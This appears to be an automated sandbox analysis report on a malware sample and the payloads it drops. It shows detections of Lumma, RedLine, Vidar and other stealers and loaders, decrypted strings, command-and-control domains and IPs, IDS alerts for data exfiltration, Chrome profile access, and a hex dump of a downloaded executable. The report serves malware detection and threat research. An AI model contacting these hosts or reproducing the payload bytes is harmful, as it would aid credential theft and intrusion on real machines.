Source: C:\ProgramData\DV Sample Construct 9.21.45\DV Sample Construct 9.21.45.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\vsfdhgg15[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\vfsdgdf[1].exe	Joe Sandbox ML: detected
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000011.00000002.2646795572.000000C00087E000.00000004.00001000.00020000.00000000.sdmp	String decryptor: carrtychaintnyw.shop
Source: 00000011.00000002.2646795572.000000C00087E000.00000004.00001000.00020000.00000000.sdmp	String decryptor: quotamkdsdqo.shop
Source: 00000011.00000002.2646795572.000000C00087E000.00000004.00001000.00020000.00000000.sdmp	String decryptor: milldymarskwom.shop
Source: 00000011.00000002.2646795572.000000C00087E000.00000004.00001000.00020000.00000000.sdmp	String decryptor: metallygaricwo.shop
Source: 00000011.00000002.2646795572.000000C00087E000.00000004.00001000.00020000.00000000.sdmp	String decryptor: opponnentduei.shop
Source: 00000011.00000002.2646795572.000000C00087E000.00000004.00001000.00020000.00000000.sdmp	String decryptor: puredoffustow.shop
Source: 00000011.00000002.2646795572.000000C00087E000.00000004.00001000.00020000.00000000.sdmp	String decryptor: achievenmtynwjq.shop
Source: 00000011.00000002.2646795572.000000C00087E000.00000004.00001000.00020000.00000000.sdmp	String decryptor: chickerkuso.shop
Source: 00000011.00000002.2646795572.000000C00087E000.00000004.00001000.00020000.00000000.sdmp	String decryptor: sentistivowmi.shop
Source: 00000011.00000002.2646795572.000000C00087E000.00000004.00001000.00020000.00000000.sdmp	String decryptor: carrtychaintnyw.shop
Source: 00000011.00000002.2646795572.000000C00087E000.00000004.00001000.00020000.00000000.sdmp	String decryptor: quotamkdsdqo.shop
Source: 00000011.00000002.2646795572.000000C00087E000.00000004.00001000.00020000.00000000.sdmp	String decryptor: milldymarskwom.shop
Source: 00000011.00000002.2646795572.000000C00087E000.00000004.00001000.00020000.00000000.sdmp	String decryptor: metallygaricwo.shop
Source: 00000011.00000002.2646795572.000000C00087E000.00000004.00001000.00020000.00000000.sdmp	String decryptor: opponnentduei.shop
Source: 00000011.00000002.2646795572.000000C00087E000.00000004.00001000.00020000.00000000.sdmp	String decryptor: puredoffustow.shop
Source: 00000011.00000002.2646795572.000000C00087E000.00000004.00001000.00020000.00000000.sdmp	String decryptor: achievenmtynwjq.shop
Source: 00000011.00000002.2646795572.000000C00087E000.00000004.00001000.00020000.00000000.sdmp	String decryptor: chickerkuso.shop
Source: 00000011.00000002.2646795572.000000C00087E000.00000004.00001000.00020000.00000000.sdmp	String decryptor: sentistivowmi.shop
Source: 00000011.00000002.2646795572.000000C00087E000.00000004.00001000.00020000.00000000.sdmp	String decryptor: carrtychaintnyw.shop
Source: 00000011.00000002.2646795572.000000C00087E000.00000004.00001000.00020000.00000000.sdmp	String decryptor: quotamkdsdqo.shop
Source: 00000011.00000002.2646795572.000000C00087E000.00000004.00001000.00020000.00000000.sdmp	String decryptor: milldymarskwom.shop
Source: 00000011.00000002.2646795572.000000C00087E000.00000004.00001000.00020000.00000000.sdmp	String decryptor: metallygaricwo.shop
Source: 00000011.00000002.2646795572.000000C00087E000.00000004.00001000.00020000.00000000.sdmp	String decryptor: opponnentduei.shop
Source: 00000011.00000002.2646795572.000000C00087E000.00000004.00001000.00020000.00000000.sdmp	String decryptor: puredoffustow.shop
Source: 00000011.00000002.2646795572.000000C00087E000.00000004.00001000.00020000.00000000.sdmp	String decryptor: achievenmtynwjq.shop
Source: 00000011.00000002.2646795572.000000C00087E000.00000004.00001000.00020000.00000000.sdmp	String decryptor: chickerkuso.shop
Source: 00000011.00000002.2646795572.000000C00087E000.00000004.00001000.00020000.00000000.sdmp	String decryptor: sentistivowmi.shop
Source: 00000011.00000002.2646795572.000000C00087E000.00000004.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000011.00000002.2646795572.000000C00087E000.00000004.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000011.00000002.2646795572.000000C00087E000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000011.00000002.2646795572.000000C00087E000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000011.00000002.2646795572.000000C00087E000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000011.00000002.2646795572.000000C00087E000.00000004.00001000.00020000.00000000.sdmp	String decryptor: a8kafm--@cloudcosmic

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0051CBD0 GetModuleHandleA,CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptAcquireContextA,SetLastError,	2_2_0051CBD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0051CE70 SetLastError,GetModuleHandleA,CryptGenRandom,	2_2_0051CE70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0051CD90 CryptReleaseContext,	2_2_0051CD90

Bitcoin Miner

Yara detected Xmrig cryptocurrency miner

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Compliance

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Users\user\Documents\iofolko5\h687rYoqxN2Ss_wvNXD9qqhf.exe

Unpacked PE file: 15.2.h687rYoqxN2Ss_wvNXD9qqhf.exe.2230000.2.unpack

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Nikko Video Compressor\videocompressor32.exe

Unpacked PE file: 35.2.videocompressor32.exe.400000.0.unpack

Source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\AppData\Local\Temp\is-3I532.tmp\kvOccCLzMNloI4W4GuGOaRuh.tmp

Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Nikko Video Compressor_is1

Source: C:\Users\user\Documents\iofolko5\pZhQ7nTCR9R3A5r5QIQYLapT.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 173.231.16.77:443 -> 192.168.2.9:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.9:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.9:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.241.61.218:443 -> 192.168.2.9:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.241.61.218:443 -> 192.168.2.9:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 54.231.236.201:443 -> 192.168.2.9:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.74.161:443 -> 192.168.2.9:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.9:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 116.203.165.127:443 -> 192.168.2.9:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.132.206.251:443 -> 192.168.2.9:49786 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.9:49789 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 116.203.165.127:443 -> 192.168.2.9:49792 version: TLS 1.2

Source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: .Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb# source: j6V5568MqaTghErAlfE30BBB.exe, 00000005.00000002.1856439100.00000000011A1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Documents\iofolko5\j6V5568MqaTghErAlfE30BBB.PDBecti source: j6V5568MqaTghErAlfE30BBB.exe, 00000005.00000002.1856439100.00000000011A1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: d:\a42sr32\win32_x86\release\pdb\UniverseDesigner\designer.pdb source: h687rYoqxN2Ss_wvNXD9qqhf.exe, 0000000F.00000000.1616062018.0000000000525000.00000002.00000001.01000000.00000011.sdmp, h687rYoqxN2Ss_wvNXD9qqhf.exe, 0000000F.00000002.2155515118.00000000024D0000.00000004.00001000.00020000.00000000.sdmp, h687rYoqxN2Ss_wvNXD9qqhf.exe, 0000000F.00000002.2154283981.0000000000525000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\day2_mixApp.pdbk source: j6V5568MqaTghErAlfE30BBB.exe, 00000005.00000002.1856439100.00000000011A1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: j6V5568MqaTghErAlfE30BBB.exe, 00000005.00000002.1856439100.00000000011A1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: PE.pdb source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe, SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe, 00000000.00000002.1356209172.0000000004E10000.00000004.08000000.00040000.00000000.sdmp, Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000002.1975575824.000000000427F000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\press\AppData\Local\Temp\Report.A66214F7-6635-4084-8609-050NK772Dll\obj\Debug\hSHxNXg.pdb source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000002.2154371709.0000000005B60000.00000004.08000000.00040000.00000000.sdmp, Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000002.1975575824.0000000004101000.00000004.00000800.00020000.00000000.sdmp, Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000002.1975575824.000000000427F000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: HPJo8C:\Windows\day2_mixApp.pdb source: j6V5568MqaTghErAlfE30BBB.exe, 00000005.00000002.1852324342.0000000000F59000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: BotClient.pdb source: Zt2eeOHcoNwxYT3C9R8h67os.exe, 0000000A.00000000.1615253504.00000000009B2000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: day2_mixApp.pdb source: j6V5568MqaTghErAlfE30BBB.exe, 00000005.00000000.1613620699.00000000008B2000.00000002.00000001.01000000.00000008.sdmp, j6V5568MqaTghErAlfE30BBB.exe, 00000005.00000002.1856439100.00000000011A1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: orlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: j6V5568MqaTghErAlfE30BBB.exe, 00000005.00000002.1856439100.00000000011A1000.00000004.00000020.00020000.00000000.sdmp

Spreading

Yara detected PrivateLoader

Source: Yara match

File source: Process Memory Space: RegAsm.exe PID: 7504, type: MEMORYSTR

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_00540905 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx,

2_2_00540905

Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exe	File opened: C:\Users\user\.ms-ad\	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exe	File opened: C:\Users\user\AppData\Local\Google\	Jump to behavior

Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exe

Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h

10_2_0175DEC8

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2018581 - Severity 1 - ET MALWARE Single char EXE direct download likely trojan (multiple families) : 192.168.2.9:49712 -> 103.130.147.211:80
Source: Network traffic	Suricata IDS: 2043231 - Severity 1 - ET MALWARE Redline Stealer TCP CnC Activity : 192.168.2.9:49745 -> 193.233.255.84:4284
Source: Network traffic	Suricata IDS: 2046045 - Severity 1 - ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) : 192.168.2.9:49745 -> 193.233.255.84:4284
Source: Network traffic	Suricata IDS: 2043234 - Severity 1 - ET MALWARE Redline Stealer TCP CnC - Id1Response : 193.233.255.84:4284 -> 192.168.2.9:49745
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.9:49739 -> 5.53.124.195:80
Source: Network traffic	Suricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 193.233.255.84:4284 -> 192.168.2.9:49745
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.9:49755 -> 5.53.124.195:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.9:49764 -> 5.53.124.195:80
Source: Network traffic	Suricata IDS: 2056008 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (chickerkuso .shop) : 192.168.2.9:63350 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056022 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (questionmwq .shop) : 192.168.2.9:55742 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056023 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (questionmwq .shop in TLS SNI) : 192.168.2.9:49794 -> 104.21.85.92:443
Source: Network traffic	Suricata IDS: 2055834 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sentistivowmi .shop) : 192.168.2.9:57707 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.9:49772 -> 45.202.35.101:80
Source: Network traffic	Suricata IDS: 2056023 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (questionmwq .shop in TLS SNI) : 192.168.2.9:49781 -> 104.21.85.92:443
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49800 -> 185.196.8.214:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49782 -> 185.196.8.214:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49791 -> 185.196.8.214:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49783 -> 185.196.8.214:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49802 -> 185.196.8.214:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49798 -> 185.196.8.214:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49793 -> 185.196.8.214:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49811 -> 185.196.8.214:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49807 -> 185.196.8.214:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49809 -> 185.196.8.214:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49808 -> 185.196.8.214:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49795 -> 185.196.8.214:80
Source: Network traffic	Suricata IDS: 2054495 - Severity 1 - ET MALWARE Vidar Stealer Form Exfil : 192.168.2.9:49784 -> 45.132.206.251:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49806 -> 185.196.8.214:80
Source: Network traffic	Suricata IDS: 2056009 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (chickerkuso .shop in TLS SNI) : 192.168.2.9:49787 -> 172.67.173.81:443
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49804 -> 185.196.8.214:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49814 -> 185.196.8.214:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49790 -> 185.196.8.214:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49788 -> 185.196.8.214:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49822 -> 185.196.8.214:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49826 -> 185.196.8.214:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49819 -> 185.196.8.214:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49825 -> 185.196.8.214:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49827 -> 185.196.8.214:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49797 -> 185.196.8.214:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49816 -> 185.196.8.214:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49824 -> 185.196.8.214:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49836 -> 185.196.8.214:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49839 -> 185.196.8.214:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.9:49833 -> 62.150.232.50:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.9:49835 -> 62.150.232.50:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.9:49830 -> 62.150.232.50:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.9:49840 -> 62.150.232.50:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49834 -> 185.196.8.214:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.9:49829 -> 62.150.232.50:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49841 -> 185.196.8.214:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49820 -> 185.196.8.214:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49837 -> 185.196.8.214:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49815 -> 185.196.8.214:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.9:49838 -> 62.150.232.50:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49817 -> 185.196.8.214:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49828 -> 185.196.8.214:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49823 -> 185.196.8.214:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49842 -> 185.196.8.214:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49832 -> 185.196.8.214:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49821 -> 185.196.8.214:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.9:49831 -> 62.150.232.50:80
Source: Network traffic	Suricata IDS: 2056009 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (chickerkuso .shop in TLS SNI) : 192.168.2.9:49779 -> 172.67.173.81:443
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49785 -> 185.196.8.214:80
Source: Network traffic	Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.9:49843 -> 62.150.232.50:80
Source: Network traffic	Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.9:49747 -> 116.203.165.127:443
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 116.203.165.127:443 -> 192.168.2.9:49753
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 116.203.165.127:443 -> 192.168.2.9:49751
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.9:49779 -> 172.67.173.81:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49779 -> 172.67.173.81:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.9:49781 -> 104.21.85.92:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49781 -> 104.21.85.92:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.9:49794 -> 104.21.85.92:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49794 -> 104.21.85.92:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.9:49787 -> 172.67.173.81:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49787 -> 172.67.173.81:443
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 116.203.165.127:443 -> 192.168.2.9:49805
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 116.203.165.127:443 -> 192.168.2.9:49801

Yara detected PrivateLoader

Source: Yara match

File source: Process Memory Space: RegAsm.exe PID: 7504, type: MEMORYSTR

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: opponnentduei.shop
Source: Malware configuration extractor	URLs: chickerkuso.shop
Source: Malware configuration extractor	URLs: sentistivowmi.shop
Source: Malware configuration extractor	URLs: metallygaricwo.shop
Source: Malware configuration extractor	URLs: quotamkdsdqo.shop
Source: Malware configuration extractor	URLs: achievenmtynwjq.shop
Source: Malware configuration extractor	URLs: milldymarskwom.shop
Source: Malware configuration extractor	URLs: carrtychaintnyw.shop
Source: Malware configuration extractor	URLs: puredoffustow.shop
Source: Malware configuration extractor	URLs: https://steamcommunity.com/profiles/76561199780418869
Source: Malware configuration extractor	URLs: http://nwgrus.ru/tmp/index.php
Source: Malware configuration extractor	URLs: http://tech-servers.in.net/tmp/index.php
Source: Malware configuration extractor	URLs: http://unicea.ws/tmp/index.php
Source: Malware configuration extractor	IPs: 45.202.35.101
Source: Malware configuration extractor	URLs: f20pt.top
Source: Malware configuration extractor	URLs: analforeverlovyu.top
Source: Malware configuration extractor	URLs: tventyvf20pt.top
Source: Malware configuration extractor	URLs: +tventyvf20pt.top
Source: Malware configuration extractor	URLs: pt.top
Source: Malware configuration extractor	URLs: @tventyvf20pt.top
Source: Malware configuration extractor	URLs: tyvf20pt.top
Source: Malware configuration extractor	URLs: 193.233.255.84:4284

Source: global traffic

TCP traffic: 192.168.2.9:49745 -> 193.233.255.84:4284

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 21 Sep 2024 12:48:08 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Fri, 20 Sep 2024 19:40:07 GMTETag: "65ba6e-6229234d7ee13"Accept-Ranges: bytesContent-Length: 6666862Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 0e 7d ed 66 00 74 5f 00 a6 25 00 00 e0 00 06 01 0b 01 02 23 00 40 48 00 00 c6 5a 00 00 e4 66 00 b0 14 00 00 00 10 00 00 00 50 48 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 f0 c6 00 00 06 00 00 29 87 66 00 02 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 a0 b3 00 42 00 00 00 00 b0 b3 00 e4 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 b3 00 68 20 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 